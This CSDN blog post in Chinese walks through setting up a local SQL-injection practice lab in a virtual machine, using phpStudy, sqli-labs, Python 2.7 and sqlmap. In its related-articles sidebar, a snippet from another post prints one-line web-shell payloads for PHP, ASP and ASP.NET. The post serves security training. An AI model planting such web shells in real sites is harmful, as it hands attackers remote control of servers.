在虚拟机中搭建本地的sqlmap靶场

最新推荐文章于 2024-02-23 15:48:09 发布
最新推荐文章于 2024-02-23 15:48:09 发布
阅读量3.6k 收藏 22
点赞数 3
分类专栏: Python sqlmap 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/milkway2013/article/details/87647378
版权
渗透测试 同时被 3 个专栏收录
13 篇文章 1 订阅
订阅专栏
Python
5 篇文章 0 订阅
订阅专栏
sqlmap
1 篇文章 0 订阅
订阅专栏

引言:

        很多喜欢渗透测试的朋友在练习sqlmap时没有环境来训练,所以笔者在这里教大家自己来搭建一个本地的训练靶场进行练习,在书写的过程中可能会有不足和错误之处,还请大家不要见怪,并加以指出,相互学习,共同进步。

0x01 在虚拟机中安装Windows7系统

  1. 虚拟机安装操作系统的步骤可以百度
  2. 安装vmtool

0x02 配置WAMP环境

1.使用phpstudy一键配置WAMP环境

phpstudy下载:http://phpstudy.php.cn/

下载后复制到虚拟机中,进行安装,安装成功后打开如下图所示:

点击启动:

0x03 Sqli-labs安装

      需要安装以下环境 (1)apache+mysql+php (2)Tomcat+mysql+java(部分关卡需要) 如果可以的话,推荐在 windows 和 linux 下分别安装: Windows 下可以用 wamp、phpstudy、apmserv 等直接安装,linux 下可在网上搜索教程进行 安装。例如 ubuntu 下,新手基本靠软件中心和 apt-get 进行安装。这里就不赘述环境的安装了。 我 的 测 试 环 境 是 windows 下 用phpstudy直 接 搭 建 的 , linux 平 台 用 ubuntu14.04 , apache+mysql+php
    同时,在后面的几个关卡中,需要用到 tomcat+java+mysql 的服务器,此处因已经安装 apache+mysql+php,所以我们需要安装 tomcat+jre+java 连接 mysql 的 jar,具体过程不详细讲解。

Sqli-labs下载:下载地址

下载完成后需要将Sqli-labs 复制Windows7虚拟机中的 web目录下,如下图:

linux 的 apache 为 /var/www/html下,windows 下的 wamp解压在 www 目录下。

修改 sql-connections/db-creds.inc 文件当中的 mysql账号密码

注:默认的MySQL数据库的用户名和密码都是root

0x04 sqlmap的安装

因为sqlmap是使用Python进行开发的,需要需要Python的运行环境,但是只兼容2.x版本的Python,不兼容3.x版本的Python,所以选择比较稳定的Python2.7版本

Python2.7的下载:百度网盘链接提取码:of6a 

sqlmap下载:https://github.com/sqlmapproject/sqlmap

然后将下载好的sqlmap复制到C:\Python27目录下

进入sqlmap文件夹,安祖shift键右击,然后选择在此处打开命令窗口

0x05 进入靶场

在虚拟机中按win+R键输入cmd进入dos系统, 输入ipconfig查看虚拟机的IP地址

然后在本机中输入192.168.10.220/ sqli-labs或者在虚拟机中输入127.0.0.1/sqli-labs进入靶场

欢迎靶场搭建成功,开始你的注入之旅吧!:)

 

mad-coding
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
Sqli-lab注入靶场安装部署
qq_42039946的博客
07-18 763
一、准备工作 1.1准备一台windows虚拟机,windows server或者windows系统均可,本文使用win10系统 1.2.准备sqli-lab源文件,可以通过https://download.csdn.net/download/qq_42039946/20359906下载 或者通过gibhub下载 https://github.com/workcha/sqli-labs-master 1.3准备phpstudy,下载链接为: https://public.xp.cn/upg...
Linux搭建pikachu靶场(CentOS7)
最新发布
mashiro_hibiki的博客
02-23 932
pikachu是一个带有漏洞的Web应用系统,它适合网安新手入门使用,这里包含了几种常见的web安全漏洞,如下:我们需要在CentOS准备搭建pikachu靶场所需的环境,这里使用LAMP web服务套件(Linux、Apache、MySQL、PHP)来搭建。首先切换到root用户,使用以下命令并输入创建虚拟机时设置的root密码,如果已经是root权限则无需切换。 使用yum指令安装Apache,Apache的服务名是"httpd"。 安装完成后,启动Apache服务并将其设置为自启动。 我
SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 1778
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
Kali linux在DVWA靶场SQL注入
qq_74298120的博客
06-20 1431
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
搭建Sqli-labs靶场
wwxxee
12-30 982
Sqli-labs是一个用来练习Sql注入的教程。 注意:sqli-labs靶场需要php环境。而且对php7不兼容,当初写这个靶场印度程序员使用的版本不是php7,当时的一些函数在php7被删除了。所以,使用此靶场请下载5.5或之前的版本。 下载地址:https://github.com/Audi-1/sqli-labs windows环境下下载压缩包。 使用phpstudy搭建环境。 直...
使用虚拟机搭建pikachu靶场
zxcvbnm123456x的博客
06-02 3094
1.我们的kali需要在VMware搭建,基于linux的操作系统2.现在打开虚拟机3.此时的账号和密码都是“kali”,之后进行登录这时我们就来到了kali的主页面,此时第一步也完成了。
sqlmap安装及使用
zhi7878的博客
04-12 7057
sqlmap安装前需要搭建python环境1.我先上官网(https://www.python.org/)下载了python的最新版本2.上官网(http://sqlmap.org/)下载sqlmap先安装python,再安装sqlmap到python的目录里在桌面建立一个快捷方式名字要和下载的sqlmap一样再之后右键点击建立好的快捷方式——属性——修改起始位置(也就是sqlmap的位置)到这就...
红日靶场环境搭建详细步骤
hacker3062的博客
09-01 1426
1、下载好镜像文件。2、直接vmware启动即可。这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131)设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130)设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141)这样win10就可以访问win7,但不能直接访问win08和win2k3。三台靶机的初始密码都是hongrisec@2019 ,初次登录需要
SQLMAP安装及使用教程
qq_45785324的博客
07-08 9962
sqlmap安装及使用教程
靶场搭建(一)VM虚拟机安装
m0_55655822的博客
02-10 1366
学习搭建靶场第一步之安装虚拟机
sqlmap文文档
07-28
该文档是对sqlmap命令的文解释,能让初学者可以根据这个文档很好的使用sqlmap工具
SQLMAP2018版本文详解
05-13
sqlmap命令文详解,2018.5.13更新 sqlmap命令文详解,2018.5.13更新 sqlmap命令文详解,2018.5.13更新 sqlmap命令文详解,2018.5.13更新 sqlmap命令文详解,2018.5.13更新
sqlmap文手册.pdf
08-13
sqlmap文版的使用,仅供学习研究使用.用户手册 介绍——介绍 sqlmap 技术——sqlmap 支持的 SQL 注入技术 特性——支持的特性列表 下载更新——更新你的 sqlmap 副本 相关依赖——关于第三方库和工具的信息 历史...
sqlmap英文对照手册.pdf
12-29
sqlmap英文对照手册由本人收集整理,请勿用于商业经营或者非法手段。如需要版权请联系作者本人,谢谢。
Kali Linux 2019.4解决文乱码问题
热门推荐
mad-coding Blog
12-03 2万+
0x00 前言 Kali Linux不用多说,知道的人都知道,国外的一个渗透测试系统,集成了很多的渗透工具,最近跟新了2019.4但是很多小伙伴安装后显示有文乱码问题,这里教大家如何解决。 0x01 更换Kali 清华大学源 使用vim编辑器修改:vim /etc/apt/sources.list添加Kali 清华大学源使用mousepad编辑器修改:mousepad /etc/apt/sou...
上传一句话木马拿shell教程
mad-coding Blog
03-21 1万+
0x00 前言 一句话木马: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 原理: php的...
2019安全渗透类工具
mad-coding Blog
07-01 7606
0x00 前言 集合github平台上的安全行业从业者自研开源扫描器的仓库,包括 子域名枚举, 数据库漏洞扫描, 弱口令或信息泄漏扫描, 端口扫描, 指纹识别 其他大型扫描器或模块化扫描器。 项目地址:https://github.com/We5ter/Scanners-Box 0x11 收集目的 本仓库收集的初衷是为向各类企业安全从业人员提供在企业信息安全防护体系建设过程...
解决burpsuite总是抓到火狐的包
mad-coding Blog
03-06 6489
问题: 在渗透测试的过程使用火狐浏览器,但是burpsuite总是抓到火狐的无用数据包,这就很烦人了,如下图 解决方法: 在网上搜索了一些网友的方法,可用方法如下: 1.在firefox(火狐浏览器)地址栏输入: about:config 2.然后出现搜索框,搜索以下内容,双击将它设置成false。 network.captive-portal-service 然后抓包...
sqlmap靶场练习
09-06
对于SQL注入漏洞的测试和练习,可以使用一些特定的靶场网站来进行实践。这些靶场网站专门设计用于测试和学习SQL注入攻击。 以下是一些常用的SQL注入靶场网站: 1. WebGoat:一个开源的Java web应用程序,提供了多种漏洞类型的实验和学习机会,包括SQL注入。 2. DVWA(Damn Vulnerable Web Application):一个专门为安全测试而制作的PHP/MySQL web应用程序,其包含各种漏洞类型,包括SQL注入。 3. bWAPP(Buggy Web Application):一个基于PHP的漏洞应用程序,提供了大量的漏洞类型,包括SQL注入。 4. HackThisSite:一个非常受欢迎的在线平台,提供了各种各样的安全挑战,包括SQL注入。 5. Mutillidae:一个用于学习和教学目的的漏洞应用程序,提供了多个漏洞类型的实验机会,包括SQL注入。 使用这些靶场网站,你可以通过尝试各种SQL注入技术来练习和提升你的技能。请注意,在进行测试时,确保只在合法授权和合规的环境进行,遵循法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值